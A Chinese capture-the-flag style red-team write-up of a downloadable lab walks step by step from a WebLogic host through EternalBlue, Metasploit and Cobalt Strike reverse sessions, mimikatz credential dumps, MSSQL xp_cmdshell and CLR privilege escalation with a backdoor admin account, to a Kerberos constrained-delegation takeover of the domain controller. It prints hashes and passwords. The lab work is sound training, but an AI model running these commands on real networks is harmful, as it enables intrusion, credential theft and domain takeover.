【附靶场环境】红队-多层内网环境渗透测试
文末下载靶场环境
靶场环境配置
网络拓扑图
靶机信息
域控:Windows Server 2008 + IIS + Exchange 2013 邮件服务
域内服务器 Mssql:Windows Server 2008 + SQL Server 2008 (被配置了非约束委派)
域内个人PC:Windows 7
单机服务器:Windows server r2 + weblogic
其他域用户:
漏洞利用
单机服务器
信息收集
nmap -p- -Pn -T4 192.168.254.112 -A
GetShell
域内个人PC机器
tasklist /SVC
hashdump
received password hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
方法一:CS移交会话到MSF
beacon为CS内置监听器,,当我们在目标系统执行payload,会弹回一个beacon的shell给CS
foreign主要是提供给外部使用的一些监听器,比如想要利用CS派生一个meterpreter的shell,来进行后续的内网渗透,这时就应该使用外部监听器
Host指向开启MSF的服务器
MSF上面执行下面命令
use exploit/multi/handler
//使用监听模块
set payload windows/meterpreter/reverse_http
//这个payload要跟CS设置的payload保持一致为http协议
set lhost 0.0.0.0
//不设置也行
set lport 8888
//端口需要与cs监听器端口保持一致,因为cs的后门是反弹的8888端口
然后运行
run
1
然后在CS上执行Spawn
选择刚才添加的派生会话给MSF的监听器
然后可以看到msf收到了shell
执行命令出现乱码,对编码格式进行修改
chcp65001
1
MSF的session中输入shell获取目标主机的远程命令行shell,使用exit退出当前的shell
如果想要退回到控制台界面
background:把meterpreter后台挂起
我们这里退回到meterpreter的位置,首先添加路由
run get_local_subnets
run autoroute -s 10.10.20.0/24
run autoroute -p
1
2
3
然后使用MSF上的ms17-010工具扫描一下
将会话挂起,退到控制台界面
background
1
search ms17-010
use 3
set rhost 10.10.20.7
run
1
2
3
4
10.10.20.7机器存在ms17-010
现在可以利用exploit/windows/smb/ms17_010_eternalblue 进行攻击, 拿下该机器
search ms17-010
use 0
set payload windows/x64/meterpreter/bind_tcp
set lport 11111
set rhosts 10.10.20.7
show options
1
2
3
4
5
6
然后执行
run
1
我这里第一次攻击失败了,win7蓝屏了,重新尝试,成功
输入shell进入终端
查看ip
通过ms17-010拿下win7
方法二:建立SOCKS隧道上线MSF
这里简略描述一下思路
首先在被控机器(weblogc服务所在机器)上传frp,建立SOCKS5隧道
然后使用MSF
msfconsole
setg Proxies socks5:192.168.254.xxx:xxxx //kali代理的ip和端口
setg ReverseAllowProxy true
use exploit/windows/smb/ms17-010-eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhost 10.10.20.7
run
1
2
3
4
5
6
7
方法一:win7执行payload上线CS
CS设置中转监听器
然后生成后门,选择刚才新建的监听器
把后门传到kali,然后在msf中使用命令上传到靶机win7上
upload beacon.exe
1
然后进入shell并执行
shell
beacon.exe
1
2
这里要注意,weblogic服务所在机器并没有关闭防火墙
netsh firewall show config
1
查看防火墙状态
netsh adfirewall set allprofiles state off
1
关闭防火墙
然后就可以上线了
方法二:MSF派生会话到CS
这里CS要准备一个监听器,上面新建的一个中转监听
MSf载入注入模块
首先看一下session的id
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lport 5678
set lhost 10.10.20.12
set session 3
1
2
3
4
5
域内服务器Mssql
我们先回到msf上面,加载mimikatz,抓取一下密码
load mimikatz
creds_all
1
2
这里除了域用户的账号密码,还看到了域控的,继续尝试其他方式
查看网段发现新的网段,继续添加路由
run get_local_subnets
run autorouts -s 10.10.10.0/24
run autorouts -p
1
2
3
这个时候我们已经通过MS17-010 -> mimikatz拿到了一个域用户的账号密码,尝试查找约束委派用户
上传一个fscan上去
fscan64.exe -h 10.10.10.0/24
1
存在另外两个主机
使用adfind工具扫描
# 查询配置了非约束委派的主机:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
# 查询配置了非约束委派的用户:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
# 查询配置了约束委派的主机:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
# 查询配置了约束委派的用户:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
1
2
3
4
5
6
7
8
9
找到sqlserver的用户设置了约束委派
对10.10.10.18机器进行尝试
80 端口、1433 SQL server端口、445 SMB端口
这里通过FRP建立多层代理
windows上使用 proxifier 设置代理链
访问80页面,没什么东西或者利用点
尝试爆破SQL server密码
使用超级弱口令工具进行检查
此时拿到了SQL server的密码
随后使用ShqrpSQLTools.exe工具对xp_cmdshell调用系统命令
.\SharpSQLTools.exe 10.10.10.18 sa sa master xp_cmdshell whoami
1
目前的权限是nt authority\network service 即为普通服务权限
在MSSQL中可以使用CLR组件提权,可以参考下面文章提权
https://www.anquanke.com/post/id/250346
使用 SharpSQLTools 开启目标 clr,进行提权
SharpSQLTools.exe 10.10.10.18 sa sa master install_clr whoami
1
SharpSQLTools.exe 10.10.10.18 sa sa master enable_clr
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato whoami
1
2
提权成功
添加一个管理员权限用户,用户名为 ocean.com 密码为 qwe.123
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net user ocean.com qwe.123 /add"
1
加入admin组
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net localgroup administrators ocean.com /add"
1
查看用户
SharpSQLTools.exe 10.10.10.18 sa sa master clr_efspotato "net user"
1
接下来上线msf
配置代理proxychains,在/etc/proxychains.conf文件中进行修改
然后通过代理启动msf即可
或者进入msf添加代理 均可
proxychains msfconsole
1
使用 mssql_clr_payload 模块
use exploit/windows/mssql/mssql_clr_payload
1
这里生成中转上线的CS马,和上述过程一样,新建监听器,通过msf上传cs马
使用 SharpSQLTools.exe 去执行 CS马,获取高权限用户,拿到 SQL server 主机
域控
这里使用了约束委派拿域控,还有很多方式比如cve-2020-1472
上线CS之后拿到用户密码
通过约束委派攻击来接管域控
上传工具 kekeo,利用 kekeo 请求该用户的 TGT:
TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi"
1
2
然后使用这个TGT获取域机器的ST
kekeo.exe "tgs::s4u /tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red"
1
使用 mimikatz 将 ST2 导入当前会话即可,运行 mimikatz 进行 ptt
mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi
1
拿到域控
总结
通过上述过程,我们对比如GPP,SQLServer提权有了新的认知或者理解,网络安全的学习离不开实际操作,想要搞明白漏洞更是要实际去复现学习。
靶场环境下载
下载链接后台回复:1206
本文由YLion 师傅首发于freebuf.com
往期推荐
一款溯源取证工具——数千条规则、涵盖所有攻击类型检测并自动导出报告